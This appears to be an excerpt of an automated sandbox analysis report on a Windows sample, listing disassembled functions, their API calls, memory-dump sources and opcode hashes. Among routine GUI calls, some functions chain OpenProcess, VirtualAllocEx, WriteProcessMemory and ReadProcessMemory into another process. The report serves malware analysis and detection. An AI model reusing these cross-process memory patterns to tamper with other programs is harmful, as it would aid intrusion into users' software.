                                                                                                                        • Opcode ID: 62cfb83b7b5bef5b7d563da29e61da4aeff2f3a90bfebd958c39198c6cdece49
                                                                                                                        • Instruction ID: f5cbab5f9bf341c041b5f3053ea48a15feefdc3825c3808692b893db0908a8b7
                                                                                                                        • Opcode Fuzzy Hash: 62cfb83b7b5bef5b7d563da29e61da4aeff2f3a90bfebd958c39198c6cdece49
                                                                                                                        • Instruction Fuzzy Hash: 02F0F935905A2227C72223356C0EBDA3E65BFD276CF640416F424921D1DE7088065120
                                                                                                                        Function 005A8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00529639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00529693
                                                                                                                          • Part of subcall function 00529639: SelectObject.GDI32(?,00000000), ref: 005296A2
                                                                                                                          • Part of subcall function 00529639: BeginPath.GDI32(?), ref: 005296B9
                                                                                                                          • Part of subcall function 00529639: SelectObject.GDI32(?,00000000), ref: 005296E2
                                                                                                                        • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 005A8A4E
                                                                                                                        • LineTo.GDI32(?,00000003,00000000), ref: 005A8A62
                                                                                                                        • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 005A8A70
                                                                                                                        • LineTo.GDI32(?,00000000,00000003), ref: 005A8A80
                                                                                                                        • EndPath.GDI32(?), ref: 005A8A90
                                                                                                                        • StrokePath.GDI32(?), ref: 005A8AA0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 43455801-0
                                                                                                                        • Opcode ID: 880811f625384f7cafed96dc88a10d03216ccd5bd4fa63b78743ad497293b7c0
                                                                                                                        • Instruction ID: d6a9bafa926ed9261b32c204509212f39831f4894a095bc47e0e22db3f1a9880
                                                                                                                        • Opcode Fuzzy Hash: 880811f625384f7cafed96dc88a10d03216ccd5bd4fa63b78743ad497293b7c0
                                                                                                                        • Instruction Fuzzy Hash: 12110976000149FFDB129F90DC88EAE7FACFB1A350F008052BA199A1A1C7719D59EBA0
                                                                                                                        Function 005751FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 00575218
                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00575229
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00575230
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00575238
                                                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0057524F
                                                                                                                        • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00575261
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDevice$Release
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1035833867-0
                                                                                                                        • Opcode ID: ce413d83f2e67e5c5b2219b6865e6ddd81dea95bc3f1141dc53e6be5b01bbaae
                                                                                                                        • Instruction ID: ad0b1388eaca1b18f430a971a13d0f30a7ef8ad6dc48fd6bf1e412b1780d21bf
                                                                                                                        • Opcode Fuzzy Hash: ce413d83f2e67e5c5b2219b6865e6ddd81dea95bc3f1141dc53e6be5b01bbaae
                                                                                                                        • Instruction Fuzzy Hash: 34014F75E00719BBEB109FA59C49A5EBFB8FB59751F044065FA04A7281D6709C04DBA0
                                                                                                                        Function 00511BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00511BF4
                                                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00511BFC
                                                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00511C07
                                                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00511C12
                                                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00511C1A
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00511C22
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4278518827-0
                                                                                                                        • Opcode ID: b6fc38aaa8901985c9f2a787d21690b57a47ac0ad622e25252784ae949c0b537
                                                                                                                        • Instruction ID: 8104bd8a3a16777a0100d31c6e56535fe1fec174e2b76d9ba146ccab654f1ad9
                                                                                                                        • Opcode Fuzzy Hash: b6fc38aaa8901985c9f2a787d21690b57a47ac0ad622e25252784ae949c0b537
                                                                                                                        • Instruction Fuzzy Hash: 56016CB09027597DE3008F5A8C85B52FFE8FF19354F04411B915C4B941C7F5A864CBE5
                                                                                                                        Function 0057EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0057EB30
                                                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0057EB46
                                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 0057EB55
                                                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0057EB64
                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0057EB6E
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0057EB75
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 839392675-0
                                                                                                                        • Opcode ID: cb8b2c5986061f3ecbe7529d368d2e85f1512affa14f6e349cd04dc55f1f8ae4
                                                                                                                        • Instruction ID: fc39b818e2df40502db5299f8939906dcd16140d734222746a9f8807cb6daf27
                                                                                                                        • Opcode Fuzzy Hash: cb8b2c5986061f3ecbe7529d368d2e85f1512affa14f6e349cd04dc55f1f8ae4
                                                                                                                        • Instruction Fuzzy Hash: E4F05E72240158BFE7219B669C0EEEF3E7CEFDBB11F004159F601D6091EBA05A05E6B5
                                                                                                                        Function 00571874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0057187F
                                                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 0057188B
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00571894
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0057189C
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 005718A5
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 005718AC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 146765662-0
                                                                                                                        • Opcode ID: 7b1f133492d5ece76174093fd546ca3583e09e08d24f743fd9ffd3a0e52d2b78
                                                                                                                        • Instruction ID: 53388d2a26a516a9766c5c590047ea269dd84adecef78addd8aa7507263693c6
                                                                                                                        • Opcode Fuzzy Hash: 7b1f133492d5ece76174093fd546ca3583e09e08d24f743fd9ffd3a0e52d2b78
                                                                                                                        • Instruction Fuzzy Hash: 63E0E536204101BBDB015FA1ED0C90ABF79FF6AB22B108625F22581070CB329425EF50
                                                                                                                        Function 0051BBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0051BEB3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_footer
                                                                                                                        • String ID: D%^$D%^$D%^$D%^D%^
                                                                                                                        • API String ID: 1385522511-1929028606
                                                                                                                        • Opcode ID: ee0637ec5ae8d1e99c32a99323fdec80142ee181e792a72d4f7fcefe397a9730
                                                                                                                        • Instruction ID: 6f991f027e25756a3003fd0b7dcf529f9e945aea5314bd44430ac6a76bf9f4a1
                                                                                                                        • Opcode Fuzzy Hash: ee0637ec5ae8d1e99c32a99323fdec80142ee181e792a72d4f7fcefe397a9730
                                                                                                                        • Instruction Fuzzy Hash: D6913875A0020ACFEB18CF59C0906EABBF1FF58314F24856AD985AB351E731AD81DBD0
                                                                                                                        Function 00597B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00530242: EnterCriticalSection.KERNEL32(005E070C,005E1884,?,?,0052198B,005E2518,?,?,?,005112F9,00000000), ref: 0053024D
                                                                                                                          • Part of subcall function 00530242: LeaveCriticalSection.KERNEL32(005E070C,?,0052198B,005E2518,?,?,?,005112F9,00000000), ref: 0053028A
                                                                                                                          • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                                                                                          • Part of subcall function 005300A3: __onexit.LIBCMT ref: 005300A9
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00597BFB
                                                                                                                          • Part of subcall function 005301F8: EnterCriticalSection.KERNEL32(005E070C,?,?,00528747,005E2514), ref: 00530202
                                                                                                                          • Part of subcall function 005301F8: LeaveCriticalSection.KERNEL32(005E070C,?,00528747,005E2514), ref: 00530235
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                                        • String ID: +TV$5$G$Variable must be of type 'Object'.
                                                                                                                        • API String ID: 535116098-200929741
                                                                                                                        • Opcode ID: df6bd5ab94a9ad3c096186925d2854cd3c3c13cb7424f0470224af7ef7d3781f
                                                                                                                        • Instruction ID: 5f0fb7d791387c32185073a1c367636e123ab176c65c60e18ac2b4aa22c28088
                                                                                                                        • Opcode Fuzzy Hash: df6bd5ab94a9ad3c096186925d2854cd3c3c13cb7424f0470224af7ef7d3781f
                                                                                                                        • Instruction Fuzzy Hash: 8A919D74A1420AEFCF04EF54D8959ADBFB5FF89300F14845AF8469B292DB71AE81CB50
                                                                                                                        Function 0057C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00517620: _wcslen.LIBCMT ref: 00517625
                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0057C6EE
                                                                                                                        • _wcslen.LIBCMT ref: 0057C735
                                                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0057C79C
                                                                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0057C7CA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 1227352736-4108050209
                                                                                                                        • Opcode ID: 8c12b89aa7b9e50b48aa6b4accfe19c2959572238dc4091454d7c4c3846d6ec9
                                                                                                                        • Instruction ID: a3dda11ab15fac253c6db574705e2fd073e956b4adf7794585aac684035722c4
                                                                                                                        • Opcode Fuzzy Hash: 8c12b89aa7b9e50b48aa6b4accfe19c2959572238dc4091454d7c4c3846d6ec9
                                                                                                                        • Instruction Fuzzy Hash: 9C51DF716043019BD7199F28E889B6B7FE8FF89310F048A2DF999D31D1DB70D944AB52
                                                                                                                        Function 0059AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 0059AEA3
                                                                                                                          • Part of subcall function 00517620: _wcslen.LIBCMT ref: 00517625
                                                                                                                        • GetProcessId.KERNEL32(00000000), ref: 0059AF38
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0059AF67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                        • String ID: <$@
                                                                                                                        • API String ID: 146682121-1426351568
                                                                                                                        • Opcode ID: 613c9ded18b41d208ab18b85f1624bde5d908540c50ba1401d1e384087b3d84e
                                                                                                                        • Instruction ID: 90671fb062b8a2f915692e78eef52098666e0e30d31774189c009a972bd22642
                                                                                                                        • Opcode Fuzzy Hash: 613c9ded18b41d208ab18b85f1624bde5d908540c50ba1401d1e384087b3d84e
                                                                                                                        • Instruction Fuzzy Hash: 55715574A0021A9FDF14DF54C488A9EBBF5FF48300F048499E816AB392DB31ED85CBA1
                                                                                                                        Function 005A6278 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 138COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindowRect.USER32(0151DD40,?), ref: 005A62E2
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 005A6315
                                                                                                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 005A6382
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ClientMoveRectScreen
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 3880355969-2594219639
                                                                                                                        • Opcode ID: 52ec338d578cd0c20444c3495194bd77716a393a8eaf88a09e74580a5eab00b8
                                                                                                                        • Instruction ID: 1750203f7b1eaf19aaf35c07f46c79752b1c70fb1ba27bb79646e6d86bf0eadb
                                                                                                                        • Opcode Fuzzy Hash: 52ec338d578cd0c20444c3495194bd77716a393a8eaf88a09e74580a5eab00b8
                                                                                                                        • Instruction Fuzzy Hash: 2D514A74A00249EFCF14DF68D880AAE7BB5FF96360F14856AF8159B290D730ED81DB90
                                                                                                                        Function 00572716 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0057B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005721D0,?,?,00000034,00000800,?,00000034), ref: 0057B42D
                                                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00572760
                                                                                                                          • Part of subcall function 0057B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005721FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0057B3F8
                                                                                                                          • Part of subcall function 0057B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0057B355
                                                                                                                          • Part of subcall function 0057B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00572194,00000034,?,?,00001004,00000000,00000000), ref: 0057B365
                                                                                                                          • Part of subcall function 0057B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00572194,00000034,?,?,00001004,00000000,00000000), ref: 0057B37B
                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005727CD
                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0057281A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                        • String ID: @$@U=u
                                                                                                                        • API String ID: 4150878124-826235744
                                                                                                                        • Opcode ID: 064dbbebfd5c402402e3f11513dd621facdad38784f15445ffb929dc226f0c2f
                                                                                                                        • Instruction ID: b7b3cf812bcab17bab430310755f0f5b6b993fc0ed95593300527fad4b2626ab
                                                                                                                        • Opcode Fuzzy Hash: 064dbbebfd5c402402e3f11513dd621facdad38784f15445ffb929dc226f0c2f
                                                                                                                        • Instruction Fuzzy Hash: 9A416D72900219AFDB10DBA4DD45BDEBBB8FF45300F108099FA59B7181DB706E85DBA1
                                                                                                                        Function 0057719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00577206
                                                                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0057723C
                                                                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0057724D
                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 005772CF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                        • String ID: DllGetClassObject
                                                                                                                        • API String ID: 753597075-1075368562
                                                                                                                        • Opcode ID: 80f6784be5d728d7666e60af358c3003d011ee086498d1c3f4699d5c60d96ee3
                                                                                                                        • Instruction ID: da2a720d7b9e695153c1b04487fd3d582e97116edaf2c8853fbfc902e3e55f44
                                                                                                                        • Opcode Fuzzy Hash: 80f6784be5d728d7666e60af358c3003d011ee086498d1c3f4699d5c60d96ee3
                                                                                                                        • Instruction Fuzzy Hash: BE417F75604208EFDB15CF54E884A9A7FB9FF49310F14C4A9BD199F20AD7B0DA44EBA0
                                                                                                                        Function 005A52C1 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 104windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 005A5352
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 005A5375
                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 005A5382
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 005A53A8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                                        • String ID: @U=u
